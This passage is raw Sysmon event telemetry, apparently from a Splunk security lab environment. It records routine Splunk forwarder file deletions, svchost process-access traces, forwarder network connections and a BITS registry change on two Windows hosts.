21:51:23.930{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=364F5B3A7E55D6C07D6F32F2A8486E0C,SHA256=53477712644293644C9E5BBF8AD6CF028B150561233E1D13AFCCC3CCC0913740,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638817Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:23.818{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C70E6B0168F6526F366A0F90BE3D1EF4,SHA256=300F4825CC61B35005357B805ABA817E009F34236F3B0ECE2454C98455838680,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918595Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:23.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918594Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:23.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918593Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:23.235{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7B0A054D3928D40550BFB9006109D93,SHA256=79EE14B5AEC86926ABA7DA3E2C890225C16CEB72D36B282222BC8DCAAC8DC14B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918600Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:24.932{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D182E7588A4E47FA32430D384EFD47BE,SHA256=D7AA770B2978E69AF7AFDECFE48415C29026EC84FC5532C41AA38ABEAE9C207A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638818Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:24.834{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE434DFC4F8882CAA7BB078E4FAF36D5,SHA256=F27EE3D6458BC585078DEF3520C2BC14B1F761C32623269D5922B176CB9319EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918599Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:24.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918598Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:24.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918597Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:20.913{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1056-false10.0.1.12-8000- 23542300x80000000000000005918604Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:25.936{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4CC821372D7F9712E074CFEAFCFFF0,SHA256=0EE751593AF98C3187A6A6E8A399924177184D5619D7C5596200289C9C578556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638822Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:25.850{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8A8D05D7F631042B7691A1605A84B35,SHA256=439281A65D9A28FBD732D6E2D8426C06F4647702D8DEF962BC1AB448FE3BE4A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918603Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:25.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918602Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:25.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918601Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:25.224{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1AEC666FCF36E1676EE16BEBF06D03E,SHA256=C94C9ED66128747E3145F87C6129FE20722D8A69037498E6E66A088EF470B187,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638821Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:21.488{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57273-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638820Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:25.334{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=90F9D73263308AA6059A5A168002261F,SHA256=70CC5C45683522E20DDBC129C638D1CBA5FE3A786781EA0C2DE027C34CBD853F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638819Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:25.334{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80F0C84E22248AB1CF4E04CF651B90E8,SHA256=D62F936CADE06ACB29A3ABAAA245A709452A73E33B2690865A7631122A78D3C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638823Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:26.865{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35CB1216FA5D1858C11EE2D37E92834,SHA256=033ACEFD11C677619E38EC0B167D9E13062B0503ED6B0064242D4103367E49C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918607Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:26.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918606Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:26.758{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 12241200x80000000000000005918605Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-DeleteValue2021-03-24 21:51:26.406{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\BITS\Performance\PerfMMFileName 23542300x8000000000000000638824Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:27.881{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A346DCD93BC66C227167A82A3235BD8,SHA256=AED7EC40B98E0C4DA2E75929D5A58525AAAED3032A9012A008E1BC2BFF20F852,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918613Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:27.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918612Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:27.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918611Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:27.424{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B358A84A318A25B51B4BECE341972071,SHA256=54D6D2E02BF48A7652592900DCEDE95F7C400B642585E05BEA9FE6BCFDB6FCA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918610Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:27.419{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B358A84A318A25B51B4BECE341972071,SHA256=54D6D2E02BF48A7652592900DCEDE95F7C400B642585E05BEA9FE6BCFDB6FCA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918609Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:27.418{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=479E81C8CBC61092F29BC1C7FB8331C3,SHA256=E5196D4D42A28E8AC72183CED0212FF5D59F06D9233CD1A35F8CCB1E0D07BD89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918608Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:27.099{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FD5CCFDE724E3F2F410F447AB5BBFB1,SHA256=5D2E613281A1CF449724CA9BDAEB49CEC98F80F8EE77D834798ED40E3F9B6596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638825Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:28.897{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD3B79DB887AC89133ECE3CBF4ADD731,SHA256=F41D37099D7751446218EFDE1916DA7B7B806210AFEA102681A08603781707BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918616Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:28.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918615Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:28.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918614Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:28.165{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C5851841D7AA1BEF466842B872E1CB3,SHA256=683FB1CD388306B5718D45931CC5259F5095108DB078DA9A3738BD1D1400D99C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638826Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:29.912{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC4AF5F44D37E7DD164214297397CD1A,SHA256=9A27161569DB46E858E307D19E804002B834BDC40D070346BA7BBEF3949A853E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918621Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:29.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918620Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:29.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918619Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:26.792{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1057-false10.0.1.12-8000- 23542300x80000000000000005918618Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:29.186{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB00F996731AD131AA18C6E6703A38F3,SHA256=6B85632F3FB4E48178B7226AC7EC5163D169416E13D0C42B3E86D0E5C55F5849,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918617Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:29.118{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14B4AA35EB2B69484825A21D18160297,SHA256=0041EED5369A42F453F4A7B5707A2D1CFF3136F063CAFAF10278FF6261F155A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638828Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:30.912{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FCFF0B76E6402454C02862B81C9087,SHA256=9FD301F316B743EE3A1FF4C0FCFEB6CE29064B6AA10956C47E96D418AF8B3D6F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918625Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:30.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918624Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:30.759{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918623Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:30.577{896A638B-FDE4-6058-4A12-00000000AE01}6364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=110595CEF9B4CBA210BA20B2379C084A,SHA256=7D73824D889500B0F5D9723AA57E5770140E65EEF42DCF932AD014F8B83C23F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918622Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:30.297{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3084F64802E39EA73B7E75F169835510,SHA256=7C4F425B725B3C30B8F493F4C95ADD1048E4DAA277B46D326D579E69720423F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638827Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:30.225{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 